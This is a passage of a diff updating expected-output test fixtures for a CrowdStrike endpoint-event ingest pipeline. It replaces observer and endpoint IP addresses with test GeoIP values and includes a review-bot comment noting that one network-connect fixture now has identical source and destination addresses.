"{\"AuthenticationId\":\"895027\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"1786917081743\",\"ContextThreadId\":\"31685015444484\",\"ContextTimeStamp\":\"1604855317.892\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"0000000000000000be341bb58bc5f1f2a24339010200510e\",\"FileObject\":\"18446636933702558240\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"1\",\"IsOnRemovableDisk\":\"0\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Size\":\"223989\",\"TargetFileName\":\"\\\\Device\\\\Mup\\\\intranet.dev\\\\int\\\\Test.pptx\",\"TokenType\":\"1\",\"aid\":\"fffffffffa474d216472f3edb73c75ed\",\"aip\":\"208.216.134.214\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"OoxmlFileWritten\",\"id\":\"ffffffff-1111-11eb-9165-067ee18a7975\",\"name\":\"OoxmlFileWrittenV11\",\"timestamp\":\"1604855329571\"}", + "ingested": "2021-12-09T13:36:11.151244100Z", + "original": 
"{\"AuthenticationId\":\"895027\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"1786917081743\",\"ContextThreadId\":\"31685015444484\",\"ContextTimeStamp\":\"1604855317.892\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"0000000000000000be341bb58bc5f1f2a24339010200510e\",\"FileObject\":\"18446636933702558240\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"1\",\"IsOnRemovableDisk\":\"0\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Size\":\"223989\",\"TargetFileName\":\"\\\\Device\\\\Mup\\\\intranet.dev\\\\int\\\\Test.pptx\",\"TokenType\":\"1\",\"aid\":\"fffffffffa474d216472f3edb73c75ed\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"OoxmlFileWritten\",\"id\":\"ffffffff-1111-11eb-9165-067ee18a7975\",\"name\":\"OoxmlFileWrittenV11\",\"timestamp\":\"1604855329571\"}", "created": "2020-11-08T17:08:49.571Z", "kind": "event", "action": "OoxmlFileWritten", @@ -9505,9 +8350,24 @@ "ip": "0:0:0:0:0:0:0:0" }, "source": { + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 50373, - "address": "a93:432:ffff:0:c830:b4bf:1e0:ffff", - "ip": "a93:432:ffff:0:c830:b4bf:1e0:ffff" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "url": { "scheme": "http" 
@@ -9521,21 +8381,12 @@ "direction": "unknown" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.222.208.124", - "vendor": "crowdstrike", - "ip": "208.222.208.124", "serial_number": "ffffffff1f924e228a807ea4c0f21b0b", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:09:11.158Z", "ecs": { 
@@ -9543,22 +8394,22 @@ }, "related": { "hosts": [ - "208.222.208.124", - "a93:432:ffff:0:c830:b4bf:1e0:ffff", + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "0:0:0:0:0:0:0:0" ], "hash": [ "3765958535" ], "ip": [ - "208.222.208.124", - "a93:432:ffff:0:c830:b4bf:1e0:ffff", + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "0:0:0:0:0:0:0:0" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466153400Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"ConnectionDirection\":\"2\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"439029805661\",\"ContextThreadId\":\"273683743193497\",\"ContextTimeStamp\":\"1604855351.158\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"a93:432:ffff:0:c830:b4bf:1e0:ffff\",\"LocalPort\":\"50373\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemotePort\":\"0\",\"aid\":\"ffffffff1f924e228a807ea4c0f21b0b\",\"aip\":\"208.222.208.124\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkListenIP6\",\"id\":\"ffffffff-1111-11eb-85f5-02ab029194b9\",\"name\":\"NetworkListenIP6V5\",\"timestamp\":\"1604855351798\"}", + "ingested": "2021-12-09T13:36:11.151250400Z", + "original": 
"{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"ConnectionDirection\":\"2\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"439029805661\",\"ContextThreadId\":\"273683743193497\",\"ContextTimeStamp\":\"1604855351.158\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"LocalPort\":\"50373\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemotePort\":\"0\",\"aid\":\"ffffffff1f924e228a807ea4c0f21b0b\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkListenIP6\",\"id\":\"ffffffff-1111-11eb-85f5-02ab029194b9\",\"name\":\"NetworkListenIP6V5\",\"timestamp\":\"1604855351798\"}", "created": "2020-11-08T17:09:11.798Z", "kind": "event", "action": "NetworkListenIP6", @@ -9598,24 +8449,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-IA", - "city_name": "Urbandale", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Iowa", - "location": { - "lon": -93.7255, - "lat": 41.6289 - } - }, - "address": "208.69.144.69", - "vendor": "crowdstrike", - "ip": "208.69.144.69", "serial_number": "ffffffff1f32487185fcde66a9dc0528", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0011104.1" + "version": "1007.4.0011104.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T14:34:30.744Z", "file": { 
@@ -9633,19 +8472,19 @@ }, "related": { "hosts": [ - "208.69.144.69" + "67.43.156.14" ], "hash": [ "e1bed7598ffdecf63a4d240f8309b528fc45068c6cb8137a5090f3afeb57f29d", "1457965279" ], "ip": [ - "208.69.144.69" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466276400Z", - "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1457965279\",\"ContextProcessId\":\"321365562189152025\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604846070.744\",\"Entitlements\":\"15\",\"SHA256HashData\":\"e1bed7598ffdecf63a4d240f8309b528fc45068c6cb8137a5090f3afeb57f29d\",\"Size\":\"29646\",\"TargetFileName\":\"/System/Library/CoreServices/SecurityAgentPlugins/HomeDirMechanism.bundle/Contents/MacOS/HomeDirMechanism/..namedfork/rsrc\",\"VnodeModificationType\":\"10\",\"aid\":\"ffffffff1f32487185fcde66a9dc0528\",\"aip\":\"208.69.144.69\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"AsepFileChange\",\"id\":\"ffffffff-1111-11eb-b9b4-063e98f9b19b\",\"name\":\"AsepFileChangeMacV2\",\"timestamp\":\"1604855355495\"}", + "ingested": "2021-12-09T13:36:11.151256800Z", + "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1457965279\",\"ContextProcessId\":\"321365562189152025\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604846070.744\",\"Entitlements\":\"15\",\"SHA256HashData\":\"e1bed7598ffdecf63a4d240f8309b528fc45068c6cb8137a5090f3afeb57f29d\",\"Size\":\"29646\",\"TargetFileName\":\"/System/Library/CoreServices/SecurityAgentPlugins/HomeDirMechanism.bundle/Contents/MacOS/HomeDirMechanism/..namedfork/rsrc\",\"VnodeModificationType\":\"10\",\"aid\":\"ffffffff1f32487185fcde66a9dc0528\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"AsepFileChange\",\"id\":\"ffffffff-1111-11eb-b9b4-063e98f9b19b\",\"name\":\"AsepFileChangeMacV2\",\"timestamp\":\"1604855355495\"}", "created": "2020-11-08T17:09:15.495Z", "kind": 
"event", "action": "AsepFileChange", @@ -9684,21 +8523,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.128.255", - "vendor": "crowdstrike", - "ip": "208.216.128.255", "serial_number": "ffffffffa5bd4efaa195a7132c576edc", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:06:31.803Z", "ecs": { 
@@ -9709,18 +8539,18 @@ "user7" ], "hosts": [ - "208.216.128.255" + "67.43.156.13" ], "hash": [ "3011122681" ], "ip": [ - "208.216.128.255" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466283800Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"2932136\",\"ContextThreadId\":\"36157339485804\",\"ContextTimeStamp\":\"1604855191.803\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogonTime\":\"\",\"PasswordLastSet\":\"\",\"UserLogonFlags\":\"1\",\"UserName\":\"user7\",\"UserSid\":\"S-1-5-10\",\"aid\":\"ffffffffa5bd4efaa195a7132c576edc\",\"aip\":\"208.216.128.255\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogonFailed\",\"id\":\"ffffffff-1111-11eb-aa5a-0207e26418af\",\"name\":\"UserLogonFailedV1\",\"timestamp\":\"1604855193422\"}", + "ingested": "2021-12-09T13:36:11.151263100Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"2932136\",\"ContextThreadId\":\"36157339485804\",\"ContextTimeStamp\":\"1604855191.803\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogonTime\":\"\",\"PasswordLastSet\":\"\",\"UserLogonFlags\":\"1\",\"UserName\":\"user7\",\"UserSid\":\"S-1-5-10\",\"aid\":\"ffffffffa5bd4efaa195a7132c576edc\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogonFailed\",\"id\":\"ffffffff-1111-11eb-aa5a-0207e26418af\",\"name\":\"UserLogonFailedV1\",\"timestamp\":\"1604855193422\"}", "created": "2020-11-08T17:06:33.422Z", "kind": "event", "action": "UserLogonFailed", 
@@ -9754,14 +8584,44 @@ "type": "windows" }, "destination": { + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 443, - "address": "2a00:ffff:11:809:0:0:0:200e", - "ip": "2a00:ffff:11:809:0:0:0:200e" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 49689, - "address": "2a02:ffff:11:8000:d140:da90:aa7a:62a5", - "ip": "2a02:ffff:11:8000:d140:da90:aa7a:62a5" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "url": { "scheme": "http" @@ -9770,30 +8630,18 @@ "preserve_original_event" ], "network": { - "community_id": "1:S6FobcKkFbNEh4m1AggfMMgitX4=", + "community_id": "1:H+oCOL0YBAZDUBNuLG0b/Xuke3g=", "transport": "tcp", "iana_number": "6", "direction": "outbound" }, "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-OH", - "city_name": "Willoughby", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Ohio", - "location": { - "lon": -81.4034, - "lat": 41.6325 - } - }, - "address": "208.68.193.187", - "vendor": "crowdstrike", - "ip": "208.68.193.187", "serial_number": "ffffffff6854438eb4181691ec47e43d", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:05:36.669Z", "ecs": { 
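Review bot: In the NetworkConnectIP6 fixture on this hunk both the source and the destination address were replaced with the same value `2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6`, so the expected event now describes a host connecting to itself on port 443 where the old fixture had two distinct endpoints. That collapses the source/destination distinction the test used to exercise, reduces `related.ip` to a single IPv6 entry and produces a new `network.community_id`, so a pipeline regression that swapped or merged LocalAddressIP6 and RemoteAddressIP6 would no longer be caught. Presumably any address in the same 2a02:cf40::/29 block is supported by the test GeoIP database, so keeping the source as is and setting the remote side to a different host, e.g. `"RemoteAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc7"` in the raw sample and regenerating, would restore the two-endpoint case. The related.ip and event.original parts of this record continue in the following hunk.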
@@ -9801,22 +8649,20 @@ }, "related": { "hosts": [ - "208.68.193.187", - "2a02:ffff:11:8000:d140:da90:aa7a:62a5", - "2a00:ffff:11:809:0:0:0:200e" + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "hash": [ "1858880895" ], "ip": [ - "208.68.193.187", - "2a02:ffff:11:8000:d140:da90:aa7a:62a5", - "2a00:ffff:11:809:0:0:0:200e" + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466290600Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1858880895\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"56042872298\",\"ContextTimeStamp\":\"1604855136.669\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"2a02:ffff:11:8000:d140:da90:aa7a:62a5\",\"LocalPort\":\"49689\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"2a00:ffff:11:809:0:0:0:200e\",\"RemotePort\":\"443\",\"aid\":\"ffffffff6854438eb4181691ec47e43d\",\"aip\":\"208.68.193.187\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkConnectIP6\",\"id\":\"ffffffff-1111-11eb-a889-061944805289\",\"name\":\"NetworkConnectIP6V5\",\"timestamp\":\"1604855199798\"}", + "ingested": "2021-12-09T13:36:11.151269500Z", + "original": 
"{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1858880895\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"56042872298\",\"ContextTimeStamp\":\"1604855136.669\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"LocalPort\":\"49689\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"RemotePort\":\"443\",\"aid\":\"ffffffff6854438eb4181691ec47e43d\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkConnectIP6\",\"id\":\"ffffffff-1111-11eb-a889-061944805289\",\"name\":\"NetworkConnectIP6V5\",\"timestamp\":\"1604855199798\"}", "created": "2020-11-08T17:06:39.798Z", "kind": "event", "action": "NetworkConnectIP6", @@ -9857,21 +8703,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.213.180.70", - "vendor": "crowdstrike", - "ip": "208.213.180.70", "serial_number": "ffffffffc07b49d6b7426e970523671a", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0011104.1" + "version": "1007.4.0011104.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T16:42:35.987Z", "file": { 
@@ -9890,19 +8727,19 @@ }, "related": { "hosts": [ - "208.213.180.70" + "67.43.156.14" ], "hash": [ "fa07e991e0c3f3661794bba39061433265162b10cd9036751941cc45e6a4b583", "1789338890" ], "ip": [ - "208.213.180.70" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466297600Z", - "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1789338890\",\"ContextProcessId\":\"321382909294815631\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604853755.987\",\"Entitlements\":\"15\",\"SHA256HashData\":\"fa07e991e0c3f3661794bba39061433265162b10cd9036751941cc45e6a4b583\",\"Size\":\"165\",\"SourceFileName\":\"/Library/Application Support/JAMF/tmp/.dat.nosync2c98.VBwjsq\",\"TargetFileName\":\"/Library/Application Support/JAMF/tmp/6B24D2B6-BC17-4470-8078-91A787A19478\",\"aid\":\"ffffffffc07b49d6b7426e970523671a\",\"aip\":\"208.213.180.70\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NewExecutableRenamed\",\"id\":\"ffffffff-1111-11eb-8773-06939a2f0915\",\"name\":\"NewExecutableRenamedMacV1\",\"timestamp\":\"1604855213224\"}", + "ingested": "2021-12-09T13:36:11.151276300Z", + "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1789338890\",\"ContextProcessId\":\"321382909294815631\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604853755.987\",\"Entitlements\":\"15\",\"SHA256HashData\":\"fa07e991e0c3f3661794bba39061433265162b10cd9036751941cc45e6a4b583\",\"Size\":\"165\",\"SourceFileName\":\"/Library/Application Support/JAMF/tmp/.dat.nosync2c98.VBwjsq\",\"TargetFileName\":\"/Library/Application Support/JAMF/tmp/6B24D2B6-BC17-4470-8078-91A787A19478\",\"aid\":\"ffffffffc07b49d6b7426e970523671a\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NewExecutableRenamed\",\"id\":\"ffffffff-1111-11eb-8773-06939a2f0915\",\"name\":\"NewExecutableRenamedMacV1\",\"timestamp\":\"1604855213224\"}", "created": 
"2020-11-08T17:06:53.224Z", "kind": "event", "action": "NewExecutableRenamed", @@ -9952,21 +8789,12 @@ "direction": "outbound" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.131.50.212", - "vendor": "crowdstrike", - "ip": "208.131.50.212", "serial_number": "ffffffffa60a47af4ebd2a76070f0d4f", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0011104.1" + "version": "1007.4.0011104.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:07:48.323Z", "ecs": { 
@@ -9974,20 +8802,20 @@ }, "related": { "hosts": [ - "208.131.50.212", + "67.43.156.14", "0:0:0:0:0:0:0:0" ], "hash": [ "203564169" ], "ip": [ - "208.131.50.212", + "67.43.156.14", "0:0:0:0:0:0:0:0" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466304400Z", - "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"203564169\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"321367236803434269\",\"ContextTimeStamp\":\"1604855268.323\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"LocalPort\":\"51076\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemotePort\":\"0\",\"aid\":\"ffffffffa60a47af4ebd2a76070f0d4f\",\"aip\":\"208.131.50.212\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkListenIP6\",\"id\":\"ffffffff-1111-11eb-9a50-0669ff09604d\",\"name\":\"NetworkListenIP6MacV5\",\"timestamp\":\"1604855268755\"}", + "ingested": "2021-12-09T13:36:11.151282800Z", + "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"203564169\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"321367236803434269\",\"ContextTimeStamp\":\"1604855268.323\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"LocalPort\":\"51076\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemotePort\":\"0\",\"aid\":\"ffffffffa60a47af4ebd2a76070f0d4f\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkListenIP6\",\"id\":\"ffffffff-1111-11eb-9a50-0669ff09604d\",\"name\":\"NetworkListenIP6MacV5\",\"timestamp\":\"1604855268755\"}", "created": "2020-11-08T17:07:48.755Z", "kind": "event", "action": "NetworkListenIP6", 
@@ -10026,21 +8854,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.134.211", - "vendor": "crowdstrike", - "ip": "208.216.134.211", "serial_number": "ffffffff6d724d38af99c628fb904626", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:08:00.307Z", "ecs": { 
@@ -10048,18 +8867,18 @@ }, "related": { "hosts": [ - "208.216.134.211" + "67.43.156.13" ], "hash": [ "3765958535" ], "ip": [ - "208.216.134.211" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466311100Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"ContextProcessId\":\"1611521722601\",\"ContextThreadId\":\"53405065993811\",\"ContextTimeStamp\":\"1604855280.307\",\"DomainName\":\"raw.githubusercontent.com\",\"DualRequest\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InterfaceIndex\":\"0\",\"RequestType\":\"1\",\"aid\":\"ffffffff6d724d38af99c628fb904626\",\"aip\":\"208.216.134.211\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"SuspiciousDnsRequest\",\"id\":\"ffffffff-1111-11eb-885e-02ac336efd4b\",\"name\":\"SuspiciousDnsRequestV2\",\"timestamp\":\"1604855323217\"}", + "ingested": "2021-12-09T13:36:11.151289100Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"ContextProcessId\":\"1611521722601\",\"ContextThreadId\":\"53405065993811\",\"ContextTimeStamp\":\"1604855280.307\",\"DomainName\":\"raw.githubusercontent.com\",\"DualRequest\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InterfaceIndex\":\"0\",\"RequestType\":\"1\",\"aid\":\"ffffffff6d724d38af99c628fb904626\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"SuspiciousDnsRequest\",\"id\":\"ffffffff-1111-11eb-885e-02ac336efd4b\",\"name\":\"SuspiciousDnsRequestV2\",\"timestamp\":\"1604855323217\"}", "created": "2020-11-08T17:08:43.217Z", "kind": "alert", "action": "SuspiciousDnsRequest", 
@@ -10101,21 +8920,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.134.193", - "vendor": "crowdstrike", - "ip": "208.216.134.193", "serial_number": "ffffffff1990483499a736373600eef7", + "address": "67.43.156.13", "type": "agent", - "version": "100.3.0011603.1" + "version": "100.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:08:35.034Z", "file": { 
@@ -10126,15 +8936,15 @@ }, "related": { "hosts": [ - "208.216.134.193" + "67.43.156.13" ], "ip": [ - "208.216.134.193" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466317900Z", - "original": "{\"ConfigBuild\":\"100.3.0011603.1\",\"ContextProcessId\":\"4492535979973\",\"ContextThreadId\":\"14023068415125\",\"ContextTimeStamp\":\"1604855315.034\",\"DiskParentDeviceInstanceId\":\"PCI\\\\VEN_8086\\u0026DEV_31E3\\u0026SUBSYS_080C1028\\u0026REV_03\\\\3\\u002611583659\\u00260\\u002690\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"VolumeDeviceCharacteristics\":\"131072\",\"VolumeDeviceObjectFlags\":\"134479872\",\"VolumeDeviceType\":\"8\",\"VolumeDriveLetter\":\"C:\",\"VolumeFileSystemDevice\":\"\\\\Ntfs\",\"VolumeFileSystemDriver\":\"\\\\FileSystem\\\\Ntfs\",\"VolumeFileSystemType\":\"2\",\"VolumeIsEncrypted\":\"0\",\"VolumeMountPoint\":\"\\\\??\\\\Volume{9b46da3f-ce44-432f-9230-c9201504bfd7}\",\"VolumeName\":\"\\\\Device\\\\HarddiskVolume4\",\"VolumeRealDeviceName\":\"\\\\Device\\\\HarddiskVolume4\",\"VolumeSectorSize\":\"512\",\"aid\":\"ffffffff1990483499a736373600eef7\",\"aip\":\"208.216.134.193\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"FsVolumeMounted\",\"id\":\"ffffffff-1111-11eb-9be9-024459b713c5\",\"name\":\"FsVolumeMountedV6\",\"timestamp\":\"1604855329102\"}", + "ingested": "2021-12-09T13:36:11.151295300Z", + "original": 
"{\"ConfigBuild\":\"100.3.0011603.1\",\"ContextProcessId\":\"4492535979973\",\"ContextThreadId\":\"14023068415125\",\"ContextTimeStamp\":\"1604855315.034\",\"DiskParentDeviceInstanceId\":\"PCI\\\\VEN_8086\\u0026DEV_31E3\\u0026SUBSYS_080C1028\\u0026REV_03\\\\3\\u002611583659\\u00260\\u002690\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"VolumeDeviceCharacteristics\":\"131072\",\"VolumeDeviceObjectFlags\":\"134479872\",\"VolumeDeviceType\":\"8\",\"VolumeDriveLetter\":\"C:\",\"VolumeFileSystemDevice\":\"\\\\Ntfs\",\"VolumeFileSystemDriver\":\"\\\\FileSystem\\\\Ntfs\",\"VolumeFileSystemType\":\"2\",\"VolumeIsEncrypted\":\"0\",\"VolumeMountPoint\":\"\\\\??\\\\Volume{9b46da3f-ce44-432f-9230-c9201504bfd7}\",\"VolumeName\":\"\\\\Device\\\\HarddiskVolume4\",\"VolumeRealDeviceName\":\"\\\\Device\\\\HarddiskVolume4\",\"VolumeSectorSize\":\"512\",\"aid\":\"ffffffff1990483499a736373600eef7\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"FsVolumeMounted\",\"id\":\"ffffffff-1111-11eb-9be9-024459b713c5\",\"name\":\"FsVolumeMountedV6\",\"timestamp\":\"1604855329102\"}", "created": "2020-11-08T17:08:49.102Z", "kind": "event", "action": "FsVolumeMounted", @@ -10195,21 +9005,12 @@ "direction": "outbound" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - 